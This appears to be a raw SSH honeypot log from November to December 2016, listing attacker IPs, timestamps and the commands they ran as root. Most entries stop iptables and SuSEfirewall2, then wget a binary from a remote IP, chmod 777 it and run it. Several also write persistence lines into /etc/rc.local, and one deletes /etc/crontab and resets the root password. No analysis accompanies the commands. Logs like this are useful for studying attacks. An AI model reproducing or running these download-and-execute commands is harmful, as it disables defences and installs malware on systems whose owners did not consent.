/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://60.28.128.69:5198/zsbb;chmod 777 zsbb;./zsbb; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://60.28.128.69:5198/zsbb chmod 777 zsbb ./zsbb From 118.193.228.220 30-Nov-2016 00:39:25 ssh2 root uname -a ps -ef rm -rf /etc/crontab find ./ -name "S90*" | passwd ababablkljkjhghfgdfdgjhkfdgfhghfgfgqqqqqqwwwwwwgqqqqqqababab From 223.221.70.204 30-Nov-2016 11:00:23 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://218.2.0.16:7898/fuck;chmod 777 fuck;./fuck; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://218.2.0.16:7898/fuck chmod 777 fuck ./fuck From 111.73.45.188 3-Dec-2016 01:06:11 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.73.45.188:9876/loog;chmod 777 loog;./loog; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://111.73.45.188:9876/loog chmod 777 loog ./loog From 114.238.140.99 5-Dec-2016 15:11:59 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://172.87.26.233:8080/linux-arm;chmod 777 linux-arm;./linux-arm;echo "cd /tmp/">>/etc/rc.local;echo "./linux-arm&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://172.87.26.233:8080/linux-arm chmod 777 linux-arm ./linux-arm echo "cd /tmp/">>/etc/rc.local echo "./linux-arm&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 114.238.140.99 6-Dec-2016 01:32:57 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://172.87.26.233:8080/Linux2.6;chmod 777 Linux2.6;./Linux2.6;echo "cd /tmp/">>/etc/rc.local;echo "./Linux2.6&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://172.87.26.233:8080/Linux2.6 chmod 777 Linux2.6 ./Linux2.6 echo "cd /tmp/">>/etc/rc.local echo "./Linux2.6&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 119.177.106.236 8-Dec-2016 05:17:47 ssh2 root Exec cd /tmp;wget http://222.187.224.76:8889/vip3;chmod 777 /tmp/vip3;./vip3; cd /tmp wget http://222.187.224.76:8889/vip3 chmod 777 /tmp/vip3 ./vip3 From 175.166.81.217 8-Dec-2016 19:03:01 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.136.132.217:22111/ssssyn;chmod 777 ssssyn;./ssssyn; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://183.136.132.217:22111/ssssyn chmod 777 ssssyn ./ssssyn From 175.166.81.217 9-Dec-2016 04:49:09 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.136.132.217:33333/uuuuudp;chmod 777 uuuuudp;./uuuuudp; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://183.136.132.217:33333/uuuuudp chmod 777 uuuuudp ./uuuuudp From 93.158.215.196 9-Dec-2016 22:41:39 ssh2 root Exec echo testing-asdf1234 echo testing-asdf1234 From 175.166.81.217 11-Dec-2016 15:25:57 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.136.132.217:33333/ssssyn;chmod 777 ssssyn;./ssssyn; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://183.136.132.217:33333/ssssyn chmod 777 ssssyn ./ssssyn From 175.166.81.217 12-Dec-2016 06:05:09 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://183.136.132.217:33333/VIP;chmod 777 VIP;./VIP; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://183.136.132.217:33333/VIP chmod 777 VIP ./VIP From 221.194.44.229 17-Dec-2016 16:59:03 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.229:7791/yuio;chmod 777 yuio;./yuio;echo "cd /tmp/">>/etc/rc.local;echo "./yuio&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://221.194.44.229:7791/yuio chmod 777 yuio ./yuio echo "cd /tmp/">>/etc/rc.local echo "./yuio&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 119.117.237.173 18-Dec-2016 18:23:17 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://42.51.193.249:2323/ssssyn;chmod 777 ssssyn;./ssssyn; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://42.51.193.249:2323/ssssyn chmod 777 ssssyn ./ssssyn From 223.221.70.199 20-Dec-2016 07:04:51 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://221.229.162.98:8999/zouni;chmod 777 zouni;./zouni; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://221.229.162.98:8999/zouni chmod 777 zouni ./zouni From 111.73.45.188 21-Dec-2016 03:46:47 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://104.160.183.6:9876/gugu;chmod 777 gugu;./gugu; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://104.160.183.6:9876/gugu chmod 777 gugu ./gugu From 118.193.228.220 21-Dec-2016 14:07:45 ssh2 root uanem -a ps- ef ps -ef From 221.194.44.252 24-Dec-2016 14:34:31 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.229:7791/pomo;chmod 777 pomo;./pomo;echo "cd /tmp/">>/etc/rc.local;echo "./pomo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://221.194.44.229:7791/pomo chmod 777 pomo ./pomo echo "cd /tmp/">>/etc/rc.local echo "./pomo&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local From 119.117.237.173 27-Dec-2016 07:32:05 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://111.67.195.55:48894/ssssyn;chmod 777 ssssyn;./ssssyn; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop wget -c http://111.67.195.55:48894/ssssyn chmod 777 ssssyn ./ssssyn From 5.254.97.69 28-Dec-2016 22:04:11 ssh2 root w cat /etc/issue uname -a cd /var/tmp ls -la From 91.197.235.11 29-Dec-2016 08:25:09 ssh2 root mkdir ". " wget superuser.000webhost.com/tmp/psy.tgz From 91.197.235.11 29-Dec-2016 18:46:07 ssh2 root ftp files.000webhost.com From 221.194.44.135 31-Dec-2016 22:30:57 ssh2 root Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;cd /tmp;wget -c http://221.194.44.229:7791/domo;chmod 777 domo;./domo;echo "cd /tmp/">>/etc/rc.local;echo "./domo&">>/etc/rc.local;echo "/etc/init.d/iptables stop">>/etc/rc.local; /etc/init.d/iptables stop service iptables stop SuSEfirewall2 stop reSuSEfirewall2 stop cd /tmp wget -c http://221.194.44.229:7791/domo chmod 777 domo ./domo echo "cd /tmp/">>/etc/rc.local echo "./domo&">>/etc/rc.local echo "/etc/init.d/iptables stop">>/etc/rc.local